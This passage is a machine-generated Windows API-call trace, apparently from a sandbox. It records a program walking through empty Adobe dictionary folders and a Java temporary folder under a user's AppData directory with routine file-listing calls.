(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.161] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.161] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.161] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.161] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.161] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.161] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.161] PathFindFileNameW (pszPath="") returned="" [0238.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.161] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.162] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.162] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.162] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.162] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\") returned="grm\\" [0238.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.162] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.162] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.162] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.162] PathFindFileNameW (pszPath="") returned="" [0238.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.163] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.163] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.163] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.163] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.163] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\") returned="itl\\" [0238.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.163] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.163] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.164] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.164] PathFindFileNameW (pszPath="") returned="" [0238.164] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.164] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.164] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.164] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.164] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.164] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.164] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\") returned="nrw\\" [0238.164] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.164] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.165] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.165] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.165] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.165] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.165] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.165] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.165] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.165] PathFindFileNameW (pszPath="") returned="" [0238.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.165] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.165] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.165] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.165] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.165] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\") returned="prt\\" [0238.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.166] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.166] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.166] PathFindFileNameW (pszPath="") returned="" [0238.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.166] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.166] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.167] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.167] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.167] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\") returned="spn\\" [0238.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.167] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.167] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.167] PathFindFileNameW (pszPath="") returned="" [0238.167] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.168] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.168] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.168] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.168] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.168] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\") returned="swd\\" [0238.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0238.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0238.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0238.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0238.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.169] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.169] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.169] PathFindFileNameW (pszPath="") returned="" [0238.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.169] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.169] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.169] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.169] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.169] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.169] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\") returned="si\\" [0238.169] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0238.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0238.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0238.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0238.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.170] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.170] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.170] PathFindFileNameW (pszPath="") returned="" [0238.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", 